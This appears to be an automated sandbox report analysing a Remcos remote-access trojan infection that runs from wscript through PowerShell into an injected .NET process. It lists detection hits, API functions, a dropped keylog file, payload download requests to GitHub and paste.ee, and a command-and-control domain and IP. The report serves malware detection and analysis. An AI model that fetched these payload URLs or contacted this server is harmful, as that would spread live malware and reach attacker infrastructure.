            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7136, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 1988, type: MEMORYSTR
            Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 10_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,10_2_004315EC
            Source: powershell.exe, 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY----- | memstr_8acd3056-1
            Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 | HTTP Parser: No favicon
            Source: unknown | HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49710 version: TLS 1.0
            Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49707 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49718 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:55748 version: TLS 1.2
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2452048534.00007FF848F10000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.2434823756.00000180F1260000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2350319452.00000180E9AA8000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,10_2_0041A01B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,10_2_0040B28E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_0040838E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_004087A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,10_2_00407848
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004068CD FindFirstFileW,FindNextFileW,10_2_004068CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0044BA59 FindFirstFileExA,10_2_0044BA59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_2_0040AA71
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,10_2_00417AAB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_2_0040AC78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,10_2_00406D28
            Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
            Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
            Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
            Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData

            Software Vulnerabilities

            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:55396 -> 64.188.16.157:23782
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:55594 -> 64.188.16.157:23782
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:55924 -> 64.188.16.157:23782
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:55821 -> 64.188.16.157:23782
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:55993 -> 64.188.16.157:23782
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:56037 -> 64.188.16.157:23782
            Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.5:49718 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 188.114.97.3:443 -> 192.168.2.5:49718
            Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 188.114.97.3:443 -> 192.168.2.5:49718
            Source: Malware configuration extractorURLs: ab9001.ddns.net
            Source: unknownDNS query: name: paste.ee
            Source: unknownDNS query: name: ab9001.ddns.net
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: global trafficTCP traffic: 192.168.2.5:55396 -> 64.188.16.157:23782
            Source: global trafficTCP traffic: 192.168.2.5:55395 -> 1.1.1.1:53
            Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d/XlUYO/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
            Source: Joe Sandbox View IP Address: 13.107.246.45
            Source: Joe Sandbox View IP Address: 13.107.246.44
            Source: Joe Sandbox View IP Address: 13.107.246.60
            Source: Joe Sandbox View IP Address: 185.199.110.133
            Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49710 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00424A66 recv,10_2_00424A66
            Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dx+SZ2r9+LVmadL&MD=TD8vCUGP HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
